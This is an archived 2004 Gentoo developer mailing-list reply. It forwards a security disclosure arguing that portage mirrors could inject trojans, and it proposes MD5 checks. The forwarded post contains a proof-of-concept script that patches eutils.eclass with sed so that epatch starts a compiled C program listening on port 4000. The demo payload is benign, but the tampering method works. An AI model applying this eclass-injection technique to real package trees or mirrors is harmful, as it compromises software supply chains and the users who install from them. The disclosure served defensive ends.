Re: [gentoo-dev] [Fwd: [gentoo-security] Trojan for Gentoo, part 2] - gentoo-dev

From:	Ioannis Aslanidis <aslanidis@×××××.com>
To:
Cc:	gentoo-dev@l.g.o
Subject:	Re: [gentoo-dev] [Fwd: [gentoo-security] Trojan for Gentoo, part 2]
Date:	Sat, 06 Nov 2004 22:06:58
Message-Id:	`ea440b1d0411061406569b0ad4@mail.gmail.com`
In Reply to:	[gentoo-dev] [Fwd: [gentoo-security] Trojan for Gentoo, part 2] by Joshua Brindle

1

Then perhaps it's time to have a simple mirror that only servers

2

portage MD5s, for example :)

3

4

5

On Sat, 06 Nov 2004 15:56:32 -0500, Joshua Brindle <method@g.o> wrote:

6

> perhaps some motivation for portage devs....

7

>

8

> -------- Original Message --------

9

> Subject:        [gentoo-security] Trojan for Gentoo, part 2

10

> Date:   Sat, 06 Nov 2004 21:16:11 +0100

11

> From:   Alexander Holler <holler@××××××××××.de>

12

> To:     gentoo-security@l.g.o

13

>

14

> Hi,

15

>

16

> after 1.5 years (2 years after the bug could could found in bugzilla) it

17

> seems that one of the highest security risks is closed. At least I've

18

> seen something about signed ebuilds. (see

19

> http://marc.theaimsgroup.com/?l=gentoo-security&m=104816199500974&w=2 ).

20

>

21

> Time for the next part. I've already written a bug for that a year ago,

22

> but it was now closed a second time by "the ... gatekeeper".

23

>

24

> See bug #26110

25

>

26

> Here's the next small script. If you are operating a gentoo mirror, or

27

> having access to one, feel free to play with it.

28

>

29

> If you are a user, the only practical way to ensure a minimum of

30

> security is to sync twice:

31

>  (a) sync,

32

>  (b) delete timestap,

33

>  (c) sync with other mirror and

34

>  (d) look if no files where different, otherwise restart with (a)

35

>

36

> ----------------gentooTrojan.sh---------------------------

37

> #!/bin/sh

38

> if [ ${#} -ne 1 ] ; then

39

>   echo "This script puts a silly trojan into Gentoo's portage."

40

>   echo "Usage: `basename ${0}` PathToPortage"

41

>   exit 1

42

> fi

43

>

44

> mv ${1}/eclass/eutils.eclass ${1}/eclass/eutils-without-trojan.eclass

45

> sed -e 's:^epatch().*{:epatch()  {\newarn "Starting Trojan.\nTry it with

46

> telnet localhost 4000.\nKill it with killall

47

> GentooTrojan."\n${PORTDIR}/eclass/GentooTrojan \&\n:'

48

> <${1}/eclass/eutils-without-trojan.eclass >${1}/eclass/eutils.eclass

49

> cat >${1}/eclass/GentooTrojan.c << EOF

50

> #include <unistd.h>

51

> #include <sys/socket.h>

52

> #include <netinet/in.h>

53

> #include <string.h>

54

>

55

> int main(void)

56

> {

57

>         struct  sockaddr_in     serv;

58

>         struct  sockaddr_in     cli;

59

>         int     sock;

60

>         sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

61

>         if (sock < 0)

62

>                 return 1;

63

>         bzero((char *) &serv, sizeof(serv));

64

>         serv.sin_family = AF_INET;

65

>         serv.sin_addr.s_addr = htonl(INADDR_ANY);

66

>         serv.sin_port = htons(4000);

67

>         if (bind(sock, (struct sockaddr *) &serv, sizeof(serv)) < 0)

68

>                 return 1;

69

>         if (listen(sock, 5) < 0)

70

>                 return 1;

71

>         while (1) {

72

>                 int     scli;

73

>                 int     slen;

74

>     static char *str="Your are listing to the famous Gentoo trojan!\n";

75

>                 slen = sizeof(cli);

76

>                 scli = accept(sock, (struct sockaddr *) &cli,

77

> (socklen_t *) &slen);

78

>     write(scli, str, strlen(str));

79

>     close(scli);

80

>         }

81

> }

82

> EOF

83

>

84

> gcc -o ${1}/eclass/GentooTrojan ${1}/eclass/GentooTrojan.c

85

>

86

> echo "Done. Portage successful infected with a trojan."

87

> echo "Just emerge an ebuild which uses epatch and do a"

88

> echo "  telnet localhost 4000"

89

> echo "afterwards."

90

> -------------------------------------------

91

>

92

> Kind regards,

93

>

94

> Alexander Holler

95

>

96

> PS: Please don't reply to me, I don't read any Gentoo mailing lists

97

> anymore, in fact I even don't know why I'm writting this message, as I

98

> already have lost every interest in Gentoo some time ago.

99

>

100

> PPS: Sorry for that hard words, but that all reminds me on Microsoft.

101

> The "eclass-hell" is as bad as the "dll-hell" and some bugs are getting

102

> forgotten, ignored or fixed in the same time.

103

>

104

> PPPS: I really appreciate all the very good work on hardened gcc,

105

> selinux-profiles and so on, but for me, this all seems useless as long

106

> as the base is compromised that easy and the user has no practical way

107

> (e.g. hashs) to check what he gets on his machine with a 'sync'.

108

>

109

> --

110

> gentoo-security@g.o mailing list

111

>

112

> --

113

> gentoo-dev@g.o mailing list

114

>

115

>

116

117

118

--

119

Ioannis Aslanidis

120

<deathwing00[at]forums.gentoo.org> 0xC2539DA3

121

<aioannis[at]tinet.org> 0xF202D067

122

<dwcommander[at]users.sourceforge.net>

123

124

Hellenic Gentoo GNU/Linux project manager (http://hellenicgentoo.sf.net)

125

FIRECOPS++ project manager (http://firecops.sf.net)

126

Gentoo Forums Global  Moderator (http://forums.gentoo.org)

127

128

Computer Engineering student at Universitat Rovira i Virgili

129

130

--

131

gentoo-dev@g.o mailing list

Gentoo Archives: gentoo-dev

Replies

1	Then perhaps it's time to have a simple mirror that only servers
2	portage MD5s, for example :)
3
4
5	On Sat, 06 Nov 2004 15:56:32 -0500, Joshua Brindle <method@g.o> wrote:
6	> perhaps some motivation for portage devs....
7	>
8	> -------- Original Message --------
9	> Subject: [gentoo-security] Trojan for Gentoo, part 2
10	> Date: Sat, 06 Nov 2004 21:16:11 +0100
11	> From: Alexander Holler <holler@××××××××××.de>
12	> To: gentoo-security@l.g.o
13	>
14	> Hi,
15	>
16	> after 1.5 years (2 years after the bug could could found in bugzilla) it
17	> seems that one of the highest security risks is closed. At least I've
18	> seen something about signed ebuilds. (see
19	> http://marc.theaimsgroup.com/?l=gentoo-security&m=104816199500974&w=2 ).
20	>
21	> Time for the next part. I've already written a bug for that a year ago,
22	> but it was now closed a second time by "the ... gatekeeper".
23	>
24	> See bug #26110
25	>
26	> Here's the next small script. If you are operating a gentoo mirror, or
27	> having access to one, feel free to play with it.
28	>
29	> If you are a user, the only practical way to ensure a minimum of
30	> security is to sync twice:
31	> (a) sync,
32	> (b) delete timestap,
33	> (c) sync with other mirror and
34	> (d) look if no files where different, otherwise restart with (a)
35	>
36	> ----------------gentooTrojan.sh---------------------------
37	> #!/bin/sh
38	> if [ ${#} -ne 1 ] ; then
39	> echo "This script puts a silly trojan into Gentoo's portage."
40	> echo "Usage: `basename ${0}` PathToPortage"
41	> exit 1
42	> fi
43	>
44	> mv ${1}/eclass/eutils.eclass ${1}/eclass/eutils-without-trojan.eclass
45	> sed -e 's:^epatch().*{:epatch() {\newarn "Starting Trojan.\nTry it with
46	> telnet localhost 4000.\nKill it with killall
47	> GentooTrojan."\n${PORTDIR}/eclass/GentooTrojan \&\n:'
48	> <${1}/eclass/eutils-without-trojan.eclass >${1}/eclass/eutils.eclass
49	> cat >${1}/eclass/GentooTrojan.c << EOF
50	> #include <unistd.h>
51	> #include <sys/socket.h>
52	> #include <netinet/in.h>
53	> #include <string.h>
54	>
55	> int main(void)
56	> {
57	> struct sockaddr_in serv;
58	> struct sockaddr_in cli;
59	> int sock;
60	> sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
61	> if (sock < 0)
62	> return 1;
63	> bzero((char *) &serv, sizeof(serv));
64	> serv.sin_family = AF_INET;
65	> serv.sin_addr.s_addr = htonl(INADDR_ANY);
66	> serv.sin_port = htons(4000);
67	> if (bind(sock, (struct sockaddr *) &serv, sizeof(serv)) < 0)
68	> return 1;
69	> if (listen(sock, 5) < 0)
70	> return 1;
71	> while (1) {
72	> int scli;
73	> int slen;
74	> static char *str="Your are listing to the famous Gentoo trojan!\n";
75	> slen = sizeof(cli);
76	> scli = accept(sock, (struct sockaddr *) &cli,
77	> (socklen_t *) &slen);
78	> write(scli, str, strlen(str));
79	> close(scli);
80	> }
81	> }
82	> EOF
83	>
84	> gcc -o ${1}/eclass/GentooTrojan ${1}/eclass/GentooTrojan.c
85	>
86	> echo "Done. Portage successful infected with a trojan."
87	> echo "Just emerge an ebuild which uses epatch and do a"
88	> echo " telnet localhost 4000"
89	> echo "afterwards."
90	> -------------------------------------------
91	>
92	> Kind regards,
93	>
94	> Alexander Holler
95	>
96	> PS: Please don't reply to me, I don't read any Gentoo mailing lists
97	> anymore, in fact I even don't know why I'm writting this message, as I
98	> already have lost every interest in Gentoo some time ago.
99	>
100	> PPS: Sorry for that hard words, but that all reminds me on Microsoft.
101	> The "eclass-hell" is as bad as the "dll-hell" and some bugs are getting
102	> forgotten, ignored or fixed in the same time.
103	>
104	> PPPS: I really appreciate all the very good work on hardened gcc,
105	> selinux-profiles and so on, but for me, this all seems useless as long
106	> as the base is compromised that easy and the user has no practical way
107	> (e.g. hashs) to check what he gets on his machine with a 'sync'.
108	>
109	> --
110	> gentoo-security@g.o mailing list
111	>
112	> --
113	> gentoo-dev@g.o mailing list
114	>
115	>
116
117
118	--
119	Ioannis Aslanidis
120	<deathwing00[at]forums.gentoo.org> 0xC2539DA3
121	<aioannis[at]tinet.org> 0xF202D067
122	<dwcommander[at]users.sourceforge.net>
123
124	Hellenic Gentoo GNU/Linux project manager (http://hellenicgentoo.sf.net)
125	FIRECOPS++ project manager (http://firecops.sf.net)
126	Gentoo Forums Global Moderator (http://forums.gentoo.org)
127
128	Computer Engineering student at Universitat Rovira i Virgili
129
130	--
131	gentoo-dev@g.o mailing list